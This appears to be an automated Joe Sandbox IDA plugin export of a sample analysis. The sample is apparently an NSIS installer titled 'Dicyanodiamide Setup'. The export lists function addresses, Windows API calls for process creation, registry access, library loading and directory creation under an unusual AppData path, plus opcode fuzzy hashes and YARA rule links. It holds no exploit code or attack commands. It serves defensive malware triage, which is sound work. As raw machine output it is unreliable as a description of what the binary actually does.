Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 79233d9e080bb56a7a15bd4cd32d02ae1266adaabd055813affb11627f6ce0f6
Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
Opcode Fuzzy Hash: 79233d9e080bb56a7a15bd4cd32d02ae1266adaabd055813affb11627f6ce0f6
Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405C48
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057F1: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges
API String ID: 1892508949-3897678559
Opcode ID: 8b115d712b5ab1ea208f506d05b2fe439a938a8f2237e224b529f97c3fde6e63
Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
Opcode Fuzzy Hash: 8b115d712b5ab1ea208f506d05b2fe439a938a8f2237e224b529f97c3fde6e63
Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E

Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
CloseHandle.KERNEL32(?), ref: 004058D9

Strings

Error launching installer, xrefs: 004058B6

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
Opcode Fuzzy Hash: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: e43136bfdbb187cc7c3565e378a88e7f01443459ecd37d37261ab9bfe82c2c69
Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
Opcode Fuzzy Hash: e43136bfdbb187cc7c3565e378a88e7f01443459ecd37d37261ab9bfe82c2c69
Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59

Function 00405C97 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405C48
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65

lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405CF0
GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420), ref: 00405D00

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
Instruction ID: afdd3353ca4dad18281e5c0e52e07b41dda899da8cc80c7b0a0d0babdec36168
Opcode Fuzzy Hash: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
Instruction Fuzzy Hash: 87F0443100DF2225F622333A0C05AAF2554DE82328BAA053FFC52B12D2DA3C88138D7E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
Opcode Fuzzy Hash: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D

Function 004053F5 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405405

Part of subcall function 0040427D: SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F

CoUninitialize.COMBASE(00000404,00000000), ref: 00405451

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
Instruction ID: a601a601f0e5ec3bbde9495229b78238806b827976c2972870ecc0a3321c7521
Opcode Fuzzy Hash: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
Instruction Fuzzy Hash: 85F090765405009BD7015B949D01BE777A4EFD431AF09843EFE85722E09B7958828E6D

Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D

Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

